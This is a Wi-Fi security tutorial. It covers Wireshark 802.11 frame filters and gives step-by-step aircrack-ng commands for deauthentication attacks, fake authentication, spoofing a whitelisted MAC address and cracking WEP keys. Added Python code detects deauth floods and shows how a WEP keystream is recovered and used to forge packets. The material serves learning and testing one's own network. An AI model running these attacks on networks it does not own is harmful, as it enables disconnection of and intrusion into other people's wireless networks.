Note that the eth.*, ip.* and tcp/udp fields only match frames Wireshark can see in clear. On a WEP or WPA network whose key you have not configured in the IEEE 802.11 protocol preferences, you can only filter on the 802.11 header fields (wlan.*).

Filter by Types of frames

wlan.fc.type == 0 – With this filter you see only the Management frames.

wlan.fc.type == 1 – With this filter you see only the Control frames.

wlan.fc.type == 2 – With this filter you see only the Data frames.

Filter by Subtypes of frames

The subtype number only has a meaning together with the type, so always combine the two. The values below are the ones defined in the 802.11 standard and the ones Wireshark uses (Wireshark also offers the combined field wlan.fc.type_subtype, for example wlan.fc.type_subtype == 0x0c for Deauthentication frames).

(wlan.fc.type == 0) && (wlan.fc.subtype == 0) – With this filter you see only the Association Request frames.

(wlan.fc.type == 0) && (wlan.fc.subtype == 1) – Association Response frames.

(wlan.fc.type == 0) && (wlan.fc.subtype == 2) – Reassociation Request frames.

(wlan.fc.type == 0) && (wlan.fc.subtype == 3) – Reassociation Response frames.

(wlan.fc.type == 0) && (wlan.fc.subtype == 4) – Probe Request frames.

(wlan.fc.type == 0) && (wlan.fc.subtype == 5) – Probe Response frames.

(wlan.fc.type == 0) && (wlan.fc.subtype == 8) – Beacon frames.

(wlan.fc.type == 0) && (wlan.fc.subtype == 10) – Disassociation frames.

(wlan.fc.type == 0) && (wlan.fc.subtype == 11) – Authentication frames.

(wlan.fc.type == 0) && (wlan.fc.subtype == 12) – Deauthentication frames.

(wlan.fc.type == 1) && (wlan.fc.subtype == 11) – “Request to Send” frames.


(wlan.fc.type == 1) && (wlan.fc.subtype == 12) – “Clear to Send” frames.

(wlan.fc.type == 1) && (wlan.fc.subtype == 13) – Acknowledgement frames.

(wlan.fc.type == 2) – Data frames, whatever the subtype (subtype 0 is a plain data frame, subtype 4 a null data frame, subtype 8 a QoS data frame).

Filter Operators

! or not – Negation. It inverts a condition. Imagine that you want all the Management frames except Beacon frames; use

(wlan.fc.type == 0) && !(wlan.fc.subtype == 8)

which is the same as wlan.fc.type == 0 && wlan.fc.subtype != 8. Note that != compares a field with a value; it does not combine two conditions, so (wlan.fc.type == 0) != (wlan.fc.subtype == 8) is not a valid way to express this.

&& or and – Both conditions must be true. Use it to tie a type to a subtype, as in all the filters above.

|| or or – At least one of the conditions must be true. If you want to see only Authentication and Deauthentication frames, that is an OR between the two subtypes:

(wlan.fc.type == 0) && ((wlan.fc.subtype == 11) || (wlan.fc.subtype == 12))

Joining the two subtype conditions with && would match nothing, because one frame has only one subtype.


Wireless Deauthentication Attack

Basically this attack sends forged deauthentication frames to one or more clients which are currently associated with a particular access point, which makes them lose the connection to the AP. Deauthentication is a management frame and in plain 802.11 it is neither encrypted nor authenticated, so anyone in range can forge one with the AP's address as the source.

There are many reasons to perform a Deauth Attack:

- Capturing WPA/WPA2 handshakes by forcing clients to re-authenticate.

- Generating ARP requests (Windows clients sometimes flush their ARP cache when disconnected).

- Recovering a hidden ESSID.

Well, there is no practical way to avoid those attacks on the kind of networks covered in this tutorial; the only real defence is 802.11w (Protected Management Frames), which authenticates deauthentication and disassociation frames, but it needs support on both the AP and every client. However, it is simple to confirm if you are the victim of a Deauthentication Attack. To do that let's use Wireshark.

Well, to get started I will use two computers in this example. One with Backtrack 5 and the other with Windows 7. The Windows 7 machine is already connected to the network, TP-LINK. The role that this machine is playing is simple, it will be the victim.

On the other hand I will use a second machine running Backtrack and it will be the Attacker and the Monitor. I will be performing a Deauthentication attack and at the same time monitoring the airwaves for Deauthentication packets with Wireshark.

In your case, if you want to check if you are the victim of a Deauthentication attack you can use any machine running Wireshark, which runs on Windows and Linux. The wireless card has to be in monitor mode to see management frames; on Linux most cards can do that, on Windows you need a card and driver made for it, such as an AirPcap adapter.

So let's get started, first let's put our wireless card in Monitor mode.

#airmon-ng start wlan1

Then let's check the networks we can reach.

#airodump-ng mon0

Then attack your own network.


#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 mon0

-0 means deauthentication attack, 10 is how many times the deauthentication is sent (0 means keep going until you stop it), -a is the access point BSSID and -c is the client to kick. This command forges deauthentication frames that look as if they came from the AP and are addressed to the client (and the reverse direction as well), so the client drops its association.

Open Wireshark on mon0 and start sniffing the airwaves.

Add the following filter to get only Deauthentication frames:

(wlan.fc.type == 0) && (wlan.fc.subtype == 12)

In Wireshark's output we get a bunch of Deauthentication frames, and as we can see the Source Address of those frames is the AP's address, so from the capture alone you can't know who is performing the attack. What gives the attack away is the pattern: a legitimate AP rarely deauthenticates the same client several times per second, so a burst like this one is the signature to look for. This type of attack will be crucial in WPA attacks, as we will see further on in this tutorial.
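To make the frame control fields behind those Wireshark filters concrete, and to turn the observation above into a check you can actually run, here is an added example in Python (not code from the tutorial, from Wireshark or from aircrack-ng). It decodes type and subtype from raw 802.11 headers exactly as wlan.fc.type, wlan.fc.subtype and wlan.fc.type_subtype do, mirrors the && and ! combinations from the filter chapter, and flags a burst of deauthentication frames from one source to one destination. All frames are constructed in the code with the AP and client addresses used in this tutorial; the reason code 7 and the threshold of 5 frames in 2 seconds are assumptions, not measured values.

```python
"""Decode 802.11 frame control fields the way Wireshark's wlan.fc.type /
wlan.fc.subtype filters see them, and flag a deauthentication flood.
Added example, not part of the original tutorial; all frames below are
constructed in code, not captured from a real network."""
from collections import defaultdict

MGMT, CTRL, DATA = 0, 1, 2

# Subtype names per type, as defined in IEEE 802.11 and used by Wireshark
SUBTYPE_NAMES = {
    MGMT: {0: "Association Request", 1: "Association Response",
           2: "Reassociation Request", 3: "Reassociation Response",
           4: "Probe Request", 5: "Probe Response", 8: "Beacon",
           10: "Disassociation", 11: "Authentication", 12: "Deauthentication"},
    CTRL: {11: "RTS", 12: "CTS", 13: "ACK"},
    DATA: {0: "Data", 4: "Null", 8: "QoS Data"},
}

def frame_control(frame):
    """Return (type, subtype) from the first frame-control byte:
    bits 0-1 protocol version, bits 2-3 type, bits 4-7 subtype."""
    fc = frame[0]
    return (fc >> 2) & 0x3, (fc >> 4) & 0xF

def type_subtype(frame):
    """Same value as Wireshark's wlan.fc.type_subtype (deauth -> 0x0c, ACK -> 0x1d)."""
    t, st = frame_control(frame)
    return (t << 4) | st

def describe(frame):
    t, st = frame_control(frame)
    return SUBTYPE_NAMES.get(t, {}).get(st, "type %d subtype %d" % (t, st))

def mgmt_addresses(frame):
    """Management frames: addr1 = destination, addr2 = source, addr3 = BSSID."""
    return frame[4:10], frame[10:16], frame[16:22]

def build_mgmt(subtype, dst, src, bssid, body=b"", seq=0):
    """Management frame: frame control, duration, three addresses, sequence control, body."""
    fc = bytes([(subtype << 4) | (MGMT << 2), 0x00])
    return fc + b"\x00\x00" + dst + src + bssid + (seq << 4).to_bytes(2, "little") + body

def matches(frame, ftype, subtype=None, exclude_subtypes=()):
    """Mirror a Wireshark expression:
    (wlan.fc.type == 0) && (wlan.fc.subtype == 12)   -> matches(f, 0, 12)
    (wlan.fc.type == 0) && !(wlan.fc.subtype == 8)   -> matches(f, 0, exclude_subtypes=(8,))"""
    t, st = frame_control(frame)
    if t != ftype or st in exclude_subtypes:
        return False
    return subtype is None or st == subtype

def detect_deauth_flood(frames, threshold=5, window=2.0):
    """frames: list of (timestamp, bytes). Flag (source, destination) pairs that sent more
    than `threshold` deauthentication frames within `window` seconds. aireplay-ng forges
    them with the AP as source, so the alert names the AP, never the attacker."""
    seen = defaultdict(list)
    for ts, frame in frames:
        if not matches(frame, MGMT, 12):
            continue
        dst, src, _ = mgmt_addresses(frame)
        reason = int.from_bytes(frame[24:26], "little")   # reason code follows the 24-byte header
        seen[(src, dst)].append((ts, reason))
    alerts = []
    for (src, dst), events in seen.items():
        events.sort()
        for i in range(len(events)):
            j = i
            while j < len(events) and events[j][0] - events[i][0] <= window:
                j += 1
            if j - i > threshold:
                alerts.append({"src": src.hex(":"), "dst": dst.hex(":"),
                               "count": j - i, "reasons": sorted({r for _, r in events[i:j]})})
                break
    return alerts

# Constructed sample capture; addresses are the AP and client from the tutorial
AP = bytes.fromhex("00805A28B5AB")
CLIENT = bytes.fromhex("0015AFA28D98")
BCAST = b"\xff" * 6

def sample_capture():
    frames = [(0.0, build_mgmt(8, BCAST, AP, AP, b"\x00" * 12)),                      # beacon
              (0.5, build_mgmt(4, BCAST, CLIENT, BCAST)),                             # probe request
              (0.6, build_mgmt(11, AP, CLIENT, AP, b"\x00\x00\x01\x00\x00\x00"))]     # open-system auth
    # ten forged deauths "from" the AP to the client, reason 7 (assumed), 10 ms apart
    frames += [(1.0 + i * 0.01, build_mgmt(12, CLIENT, AP, AP, (7).to_bytes(2, "little")))
               for i in range(10)]
    return frames
```

In practice you would feed detect_deauth_flood() frames read from a pcap (for example with scapy) instead of sample_capture(). Note what the alert reports: the source is the AP's BSSID, because that is what aireplay-ng put there; the attacker's own MAC never appears, which is exactly the limitation noted above.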


Fake Authentication

Fake Authentication is useful on WEP attacks and it doesn't work on WPA networks, because in WPA the association alone gives you nothing; the traffic keys only come out of the four-way handshake.

In WEP cracking attacks we will face two types of WEP networks, one with Open System Authentication and the other called Shared Key Authentication.

Open System Authentication is simple to fake and you can start whenever you want, however in Shared Key Authentication networks you will always need a connected client.

If the network doesn't have a connected client just wait until someone connects to the network. We need someone from inside the network to show up because the AP challenges the client with 128 random bytes and the client answers with that challenge WEP-encrypted. Capturing that exchange gives us a 140 byte keystream (the encrypted reply is the 6 byte authentication header, the 2 byte challenge element header, the 128 byte challenge and the 4 byte ICV, XORed with RC4 output), and with that keystream we can answer a challenge ourselves without knowing the key. Without it we cannot authenticate. Remember that Open System authentication and Shared Key authentication work differently.

Open System Fake Authentication

So, imagine that you already have your target figured out.

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated with the access point, it will ignore the packet and send out a "Deauthentication".

In this state, no new initialization vectors are created because the access point is ignoring all the injected packets. The lack of association with the access point is the single biggest reason why packet injection fails. At this point you are just connecting to the access point and telling it you are here and want to talk to it; this does not give you any ability to transfer data, because you still don't know the WEP key.


#aireplay-ng -1 10 -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 mon0

Where -1 means fake authentication, 10 is the re-association timing in seconds (aireplay-ng authenticates again every 10 seconds so the AP keeps the association alive; 0 means authenticate once), -a is the access point MAC address, and -h is the MAC address under which you act (either your own or a spoofed one).

When it works, the output ends with “Association successful :-)”. If instead you see “Got a deauthentication packet!” or the attempts keep repeating, check that -a and -h are right, that your card is on the AP's channel, and that the AP is not filtering MAC addresses.

Shared Key Fake Authentication

First of all, as always, put your wireless card in monitor mode.

#airmon-ng start wlan0

Then let's look at our network, WLAN will be the target network.

#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w sharedkey wlan0

Using this we will sniff all the packets from the WLAN network and save them in files whose names start with sharedkey. We will need to perform a deauthentication on an authenticated client in order to capture the shared key 140 byte keystream when it authenticates again.


If you try to fake authenticate as you've learned before you will get an error like the following image shows: the authentication fails and aireplay-ng prints “Switching to shared key authentication” followed by “Please specify a PRGA-file (-y)”...

This means that the network you are attacking now uses the Shared Key Authentication system.

So, to fake authenticate in a Shared Key network we need to deauthenticate a client.

Run airodump-ng to sniff the target network:

#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w sharedkey wlan0

With this you are only looking at the target's network. As you saw before there was a connected client, its MAC is 00:15:AF:A2:8D:98.

So let's deauthenticate him (the client goes in -c; -h would set the source address of the forged frames, which is not what we want here):

#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 mon0


After you perform the deauthentication and the client authenticates again, look at the top line in the airodump-ng window: there is now a text saying “140 bytes keystream: 00:80:5A:28:B5:AB”

This means airodump-ng has captured the challenge and the encrypted reply and written the keystream into the .xor file we were looking for to perform a fake authentication (the file name starts with the capture prefix and contains the BSSID; check the directory for the exact name).

Use the following command:

#aireplay-ng -1 0 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 -y sharedkey-01-00:80:5A:28:B5:AB.xor wlan0

-y is the keystream file; aireplay-ng uses it to encrypt the challenge the AP sends us, which is why no WEP key is needed. Since no -h is given, the card's own MAC address is the one that gets authenticated.

With this we've managed to fake authenticate in a Shared Key network.


MAC Filtering

In some cases you might find some security barriers, like MAC Filtering, which is still easy to break. Imagine that you are trying to fake authenticate with an AP and, although the command is right, aireplay-ng keeps failing and finally gives up with “Attack was unsuccessful. Possible reasons:”, listing MAC address filtering first:

MAC Filtering is enabled on this network. To get through this security trick we need a legitimate MAC address which has permission to connect to the AP. MAC addresses travel in the clear in every frame, so the whitelist leaks itself to anyone listening.

Run airodump-ng and wait until someone connects to that network, or if someone's already connected use its MAC address as your own.

As we can see there is one client connected to WLAN, its MAC is 00:15:AF:A2:8D:98. Let's make it our own MAC address as well:


#macchanger -m 00:15:AF:A2:8D:98 wlan1

This command will change the MAC address of the wlan1 device to 00:15:AF:A2:8D:98. The interface has to be down while macchanger changes it (ifconfig wlan1 down before, ifconfig wlan1 up afterwards), otherwise it fails with a “Device or resource busy” error. Giving the card itself the spoofed address, and not only the -h option, also makes the card acknowledge the frames the AP sends to that address, which helps injection.

Even if the client stays connected to the network you can begin to fake authenticate.

#aireplay-ng -1 10 -a 00:80:5A:28:B5:AB -h 00:15:AF:A2:8D:98 mon0

This time don't forget to use the spoofed MAC in the -h option; the injected frames must carry the whitelisted address or the AP drops them. Be aware that while the real client is active you are both transmitting with the same address, which can disturb the legitimate client.

This brief explanation of what Fake Authentication is will help you in WEP cracking, which we will see later in this tutorial. With this information you shouldn't have any trouble doing this trick and performing WEP cracking.


Cracking WEP with a client connected (OPEN System)

The weakness of WEP resides in the IV. Every packet is encrypted with RC4 using a per-packet key made of a 24 bit initialization vector followed by the secret key, and the IV is sent in plaintext in front of the encrypted data, so anyone who grabs the packet knows the first 24 bits of the RC4 key that produced it. With only 24 bits there are about 16 million different IVs, so a busy network repeats them within hours, and RC4 leaks information about the rest of the key for many of them. Gather enough packets and a statistical attack (FMS, KoreK and, in current aircrack-ng, PTW) recovers the key; it is not a brute force of the key space, which is why some 50 000 packets are enough against a 104 bit key. Also contributing to WEP's weakness is the discovery that some IVs are weaker than others (the “weak IVs” of the FMS attack), and software can recognise them and use them to crack the key even quicker.

Once the theory of how to crack WEP was proven possible, computer programs were written that streamlined the process. There are two steps involved. Once an encrypted wireless network is found and the attacker is in range, the program intercepts packets and logs the IVs. The packets contain encrypted data and are worthless individually, but if enough IVs are logged the key can be cracked. Usually about 50 000 IVs are needed to crack WEP with the PTW attack (fewer for a 40 bit key, more if the captured packets are not ARP traffic). The number of IVs travelling is related to network traffic, so if no one is using the network it can take days to get that many; that is why you need to create artificial traffic. On the other hand, if someone is already connected and active you can get a lot of IVs fast without any problems.

Of course there is a method of speeding up the collection of IVs, through a certain type of packet injection, although this technique is not supported by all wireless cards. This type of packet injection is called ARP injection (or ARP replay). The attacker captures an encrypted ARP request coming from an associated client and re-sends it over and over; the access point, as on any WLAN, rebroadcasts every ARP request it receives to the wireless side, and each rebroadcast is encrypted with a new IV, which is then captured. ARP requests can be recognised without decrypting them because they have a fixed size and a broadcast destination, so the program does not need the key to pick them out. To perform this injection, the source of the ARP request must be associated with the AP, or else the AP will drop it. The software replays the client's own frame, so the request looks like it came from an associated client, not from the attacker's computer.

As I told you, I will be using the aircrack-ng wireless security suite that comes with the Backtrack Linux distribution for WEP attacks. Aircrack-ng contains all the tools necessary for discovering and cracking wireless networks.

First let's try to break a network with a connected client.

Once a network has been identified through any technique, the basic steps to crack WEP encrypted networks, and the programs used to accomplish them, are:

1) Put the wireless card in passive monitor mode (airmon-ng)

2) Begin capturing packets that contain unique IVs and save them to the disk (airodump-ng)

3) Inject ARP requests from an associated client to generate new packets (aireplay-ng)


4) Once enough IVs have been captured, run a cryptographic attack to decipher the

WEP key (aircrack-ng)

In this case, I will attack my own network, so it is as if the attacker, me, had already identified the WEP encrypted network he wants to crack. The information he will need to start collecting IVs is the BSSID of the access point and the channel it is operating on. This information is easy to get using airodump-ng, which will also be used to capture the IVs and save them to a file. In this case the BSSID of the network we are trying to crack is 00:80:5A:28:B5:AB, the channel is 11, and we will call the output file wepkey.

Let's put our card in monitor mode, but first you need to know the interface to use:

#airmon-ng

Figure 1. Using Airmon-ng

You now have a list of the wireless interfaces on your machine. If you have only one wireless card you will have only one interface; if you have two wireless cards connected you have two interfaces. I might use different cards throughout the tutorial, so when you see wlan1 and your interface is wlan0, use wlan0 instead of wlan1.

Remember I'm making the attacks on my machine and it could be different from yours. So I will use wlan1 for this tutorial. To put that interface in monitor mode use:

#airmon-ng start wlan1

By now you still have the wlan1 interface and the system has created a new interface called mon0. This is a virtual interface; “mon” comes from monitor, meaning that mon0 is the interface that is in monitor mode.

Whether you pass mon0 or wlan1 to the following commands depends on the driver: with the mac80211 drivers that BackTrack 5 uses, mon0 is the monitor-mode interface and the one the aircrack-ng tools expect. If a command complains that the interface is not in monitor mode, or airodump-ng shows no networks at all, switch to mon0. Let's go back to the tutorial...


Now let's sniff traffic from the network that we will attack, so use:

#airodump-ng wlan0

Figure 2. Using Airodump-ng to check for the network to attack

As I told you before, the network I'm attacking is mine. My network is called WLAN, so by using airodump-ng I already know the BSSID and the channel. Let's get started:

#airodump-ng --channel 11 --bssid 00:80:5A:28:B5:AB --write wepkey wlan0

Figure 3. Using Airodump-ng on the target network

As we can see, “#Data” is the number of data packets (for a WEP network, unique IVs) we have caught so far, and they are saved in wepkey-01.cap. airodump-ng appends a counter to the prefix and increments it every time you start it again with the same prefix, so you may end up with wepkey-01.cap, wepkey-02.cap and so on; that's why in the end we will give aircrack-ng “wepkey*.cap”.


The “#/s” is the number of data packets (unique IVs) we get per second. As you can see there is almost no traffic in this network, and doing the math, if we try to get 50 000 IVs at 2 per second we would need to wait 25 000 seconds, almost 7 hours, to get enough IVs. So why don't we start a packet injection technique to speed up the unique IV collection?

We can do that using aireplay-ng:

#aireplay-ng --arpreplay -b 00:80:5A:28:B5:AB -h 00:15:AF:A2:8D:98 wlan0

-b 00:80:5A:28:B5:AB is the access point MAC address

-h 00:15:AF:A2:8D:98 is the MAC address of the client that we will use as the “ARP requester”

This command will wait for an ARP request coming from the network and flood the airwaves with that ARP request, making it look like it is coming from the associated client. An ARP request is when, for example, the router asks “Who has this IP?”, and the ARP reply is the computer answering “I have that IP, here is my MAC address: A1:B2:C3:D4:E5:F5”.

So if you are attacking a network that has only one client connected, it could take a while until you get an ARP request. If there is traffic coming from the network you might get it the simple way. Imagine the situation: there is a client connected but it is not doing anything, as if it were in “stand-by” mode. You can do it the hard way by deauthenticating the client, forcing it to reconnect and talk to the router again. Use the following command:

#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 wlan0

-0 means deauthentication attack

10 is the number of times the deauthentication is sent

-a 00:80:5A:28:B5:AB is the access point MAC address

-c 00:15:AF:A2:8D:98 is the MAC address of the client to be deauthenticated (-h would set the source address of the forged frames instead, which is not what we want here)

When the client gets back on the network you will get some ARP requests and the --arpreplay window starts injecting. Well, this is a simple process: you capture an ARP request and you replay it. That's what “aireplay-ng -3” or “aireplay-ng --arpreplay” is doing. It waits for an ARP request and replays it, gets another one and replays it again, and keeps doing it, consequently generating traffic on the network. Remember that the traffic we are collecting is nothing but packets carrying the IVs that we will feed to aircrack-ng's statistical attack on the WEP key.


Figure 4. Capturing Packets Airodump-ng

After you get the first ARP request you should be getting something like the image above. It's just a matter of time until you get enough IVs to run the attack. Once you get around 50 000 you have a good chance of cracking the network.

However, if you fail, just repeat the process. Get more IVs and try again. You'll need more IVs depending on how big the key is. There are 64-bit keys, 128-bit keys and 152-bit keys (40, 104 and 128 secret bits; the other 24 bits are the IV); more bits means more key bytes to recover, and we might need more IVs to crack the key. So if you fail with 50 000, get more IVs and you will get the key. aircrack-ng re-reads the capture files and tries again as they grow, so you can leave it running while airodump-ng keeps collecting.

As you know, the captured data packets containing IVs are stored in the files that I named wepkey, written by airodump-ng. The program writes multiple files to the current directory in different formats (.cap, .csv, .kismet.csv, .kismet.netxml), but the ones we are interested in are the .cap files.

To perform the crack use wepkey*.cap, since it could write more than one .cap file, for example wepkey-01.cap, wepkey-02.cap...

The attack starts with this command (aircrack-ng reads capture files only, so the interface name does not go here):

#aircrack-ng -b 00:80:5A:28:B5:AB wepkey*.cap


Figure 5. Using aircrack-ng to crack WEP

So as you can see it found the WEP key of the network. The key I used for this example was “abcdef1234”, a 40 bit key written as 10 hex digits, and as you see in aircrack-ng's output “KEY FOUND! [AB:CD:EF:12:34]”

This was the example of how to break a WEP network with an already authenticated client. When you don't have any clients connected to the network you want to break, you need a different type of attack; let's find out how we can do it.

The best way to stop someone getting into your network is definitely not to use WEP encryption at all. Use WPA2 (WPA2-PSK with AES/CCMP and a long passphrase).


Cracking WEP without connected clients (OPEN System)

Let's see now how to do it if no one is connected to the network.

This type of attack needs at least one encrypted data packet from the AP to work on. It's true that there are no clients connected over wireless, however the AP has RJ45 ports and normally there is some traffic coming from the wired side (broadcasts, DHCP, the router's own ARP requests), which the AP forwards to the air, encrypted. Why do we need it?

Well, without knowing the key we cannot build a valid encrypted packet from nothing. You can try, but the AP checks the ICV of every WEP frame, throws away anything that doesn't decrypt correctly and, if the source is not associated, sends a deauthentication packet to that fake client.

However, if we get a packet from the wired side, then using either a chopchop attack or a fragmentation attack we can recover the RC4 keystream (PRGA) that encrypted it, saved as a .xor file. A keystream and its IV are all we need to encrypt a packet of our own, an ARP request, that the AP will accept and rebroadcast, and every rebroadcast gives us a new IV.

That forged packet is accepted by the AP because it decrypts correctly: same IV, same keystream, valid ICV.

After we create that legitimate packet and inject it in the air, you will be able to resume the attack as we did before with a connected client. When we have enough IVs, it's time to crack the key.

So, let's get started. First, put the wireless card in monitor mode. You know the drill:

#airmon-ng start wlan0

Then use:

#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 wlan0

At this point you don't really need the “-w” parameter, because you will get few packets. It's up to you.

Let's now associate with the access point, using a fake authentication:

#aireplay-ng -1 0 -e WLAN -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 wlan0

-1 means fake authentication attack

0 is the re-association delay in seconds; 0 means authenticate once and exit (use a value such as 10 when you need the association kept alive during a long run)

-e WLAN is the wireless SSID


-a 00:80:5A:28:B5:AB is the access point MAC address

-h 74:EA:3A:90:C7:21 is our card's MAC address

Figure 6. Perform a Fake Authentication

So I succeeded in performing a fake authentication with the AP.

Now I need to obtain the PRGA file. PRGA stands for Pseudo Random Generation Algorithm, the part of RC4 that produces the keystream; the file (the .xor file) holds the keystream bytes for one IV, recovered by XORing a captured packet with what its plaintext is known to be.

To obtain it we will need to perform a chopchop attack or a fragmentation attack.

This PRGA is not the WEP key and cannot be used to decrypt packets sent with other IVs. However, it can be used to create new packets for injection. The creation of new packets will be covered later in the tutorial.

Either the chopchop or the fragmentation attack can be used to obtain the PRGA file. The result is the same, so use one of them; it doesn't really matter which one you use (fragmentation is faster and yields up to 1500 bytes of keystream, chopchop works against more access points but only gives as many bytes as the packet it chops).

I will cover the chopchop technique. Start another console session and run:

#aireplay-ng -4 -b 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 wlan0

-4 means the chopchop attack

-b 00:80:5A:28:B5:AB is the access point MAC address

-h 74:EA:3A:90:C7:21 is the MAC address of our card and must match the MAC used in the fake authentication

wlan0 is the wireless interface name


Figure 7. Performing chopchop attack

So after you perform the fake authentication you need to wait until you get a packet to attack. I kept one console window performing fake authentications every second, as you can see, so that I don't get deauthenticated for any reason, and another one with the chopchop attack waiting for a packet to start.

When the console asks you “Use this packet?” press “y” and then ENTER to start the chopchop attack.

Figure 8. Result of chopchop attack


Wait a few seconds for the chopchop attack to do its magic. The file “replay_dec-0917-223734.xor” that you can see above (the name carries the date and time, so yours will differ) can now be used in the next step to generate an ARP packet.

The objective is to have the access point rebroadcast the injected ARP packet. When it rebroadcasts it, a new IV is obtained. All these new IVs will ultimately be used to crack the WEP key.

Use the following command:

#packetforge-ng -0 -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0917-223734.xor -w arp-request

-0 means generate an ARP packet

-a 00:80:5A:28:B5:AB is the access point MAC address

-h 74:EA:3A:90:C7:21 is the MAC address of our card

-k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)

-l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255)

-y replay_dec-0917-223734.xor is the file to read the PRGA from

-w arp-request is the name of the file to write the ARP packet to

The system will respond: “Wrote packet to: arp-request”
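The .xor files that chopchop, the fragmentation attack and the shared key capture produce are all the same thing: RC4 ke
ystream for one IV. The following added Python example (not code from the tutorial or from aircrack-ng) implements WEP as RC4(IV || key) with a CRC-32 ICV, recovers a keystream from a shared key authentication exchange by XORing the encrypted reply with the known challenge, which shows where the “140 bytes keystream” of the Fake Authentication chapter comes from, and then does what packetforge-ng does above: it builds a new ARP request under that IV and keystream which the AP (simulated here with the real key) accepts as valid, while the attacker side never touches the key. The key abcdef1234 is the one used in this tutorial; the IV, the challenge bytes and the ARP contents are constructed for the example.

```python
"""WEP as RC4(IV || key): recover a keystream ("PRGA", the .xor file) from a packet whose
plaintext is known, and forge a new, valid packet with it without knowing the key.
Added example, not part of the original tutorial or of aircrack-ng; the key, the IV and
all frames are constructed here."""
import struct
import zlib

def rc4_keystream(key, length):
    """Plain RC4: key scheduling followed by the PRGA producing `length` bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def icv(data):
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key, iv, plaintext):
    """Frame body: IV (3 bytes, in the clear) + key id byte + RC4(IV||key) XOR (plaintext||ICV)."""
    assert len(iv) == 3 and len(key) in (5, 13)
    data = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(data, rc4_keystream(iv + key, len(data)))

def wep_decrypt(key, body):
    """Return (plaintext, icv_ok). An AP drops frames whose ICV does not verify."""
    iv, ct = body[:3], body[4:]
    data = xor(ct, rc4_keystream(iv + key, len(ct)))
    pt, tag = data[:-4], data[-4:]
    return pt, tag == icv(pt)

def recover_keystream(body, known_plaintext):
    """What chopchop, fragmentation and the shared key capture deliver: ciphertext XOR
    known plaintext is the RC4 output for this IV, for as many bytes as we know."""
    return body[:3], xor(body[4:], known_plaintext)

def forge(iv, keystream, plaintext):
    """packetforge-ng idea: encrypt a new payload with a recovered IV/keystream pair.
    Needs len(plaintext) + 4 <= len(keystream). The WEP key is never used."""
    data = plaintext + icv(plaintext)
    if len(data) > len(keystream):
        raise ValueError("not enough keystream: need %d bytes" % len(data))
    return iv + b"\x00" + xor(data, keystream)

KEY = bytes.fromhex("abcdef1234")   # the 40-bit key from the tutorial
IV = b"\x01\x02\x03"                # constructed IV

# Shared key authentication, message 3: the client returns the AP's 128-byte challenge
# WEP-encrypted. Body = auth algorithm (1) | sequence (3) | status (0) | element id 0x10 |
# length 0x80 | challenge. With the ICV that is 6 + 2 + 128 + 4 = 140 bytes of keystream,
# the "140 bytes keystream" airodump-ng reports.
def ska_response_body(challenge):
    return struct.pack("<HHH", 1, 3, 0) + b"\x10\x80" + challenge

def keystream_from_ska(challenge, encrypted_response):
    """An eavesdropper sees the challenge in message 2 and the encrypted reply in message 3."""
    known = ska_response_body(challenge)
    return recover_keystream(encrypted_response, known + icv(known))

# An ARP request has a fixed, known header (LLC/SNAP + ARP), which is why it is both a
# convenient known plaintext and the packet packetforge-ng -0 builds.
ARP_PREFIX = bytes.fromhex("aaaa03000000" "0806" "0001" "0800" "06" "04" "0001")

def demo():
    challenge = bytes(range(128))                               # constructed AP challenge
    msg3 = wep_encrypt(KEY, IV, ska_response_body(challenge))   # what the real client sends
    iv, ks = keystream_from_ska(challenge, msg3)
    # Forge a broadcast ARP request "from" 74:EA:3A:90:C7:21 for 255.255.255.255 -> 255.255.255.255
    arp = (ARP_PREFIX + bytes.fromhex("74EA3A90C721") + bytes([255, 255, 255, 255])
           + b"\x00" * 6 + bytes([255, 255, 255, 255]))
    forged = forge(iv, ks, arp)
    pt, ok = wep_decrypt(KEY, forged)        # the AP's view: decrypt with the real key, check ICV
    return len(ks), ok, pt == arp
```

demo() returns (140, True, True): 140 bytes of keystream out of one shared key exchange, and a forged frame that verifies at the AP. The same code explains why a PRGA file is useless for decrypting other packets and why injection stops working the moment the key changes: the keystream is tied to one IV and one key.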

Let's close the console running airodump-ng, open a new one and start airodump-ng again. This time you need to add the “-w” parameter so we can save the IVs we will generate to a file. If you used it already in the first one then you don't need to close it.

So use airodump-ng like this:

#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w wepkey wlan0

Let's call that file wepkey.

In the console window you used to create the packet, use this command:

#aireplay-ng -2 -b 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -r arp-request wlan0

-2 is the interactive replay attack and -r tells it to read the packet to replay from the file we just created. aireplay-ng shows the packet and asks whether you want to use it; press “y” and ENTER and it starts injecting our ARP request in the air.

Once you are injecting the ARP request you just created, the cracking process is just like cracking WEP with a previously associated client.


Figure 6. Injecting artificial packets

As you can see, now we are getting a lot of data (IVs).

Remember once again, when you get around 50 000 IVs you have a good chance of cracking the network.

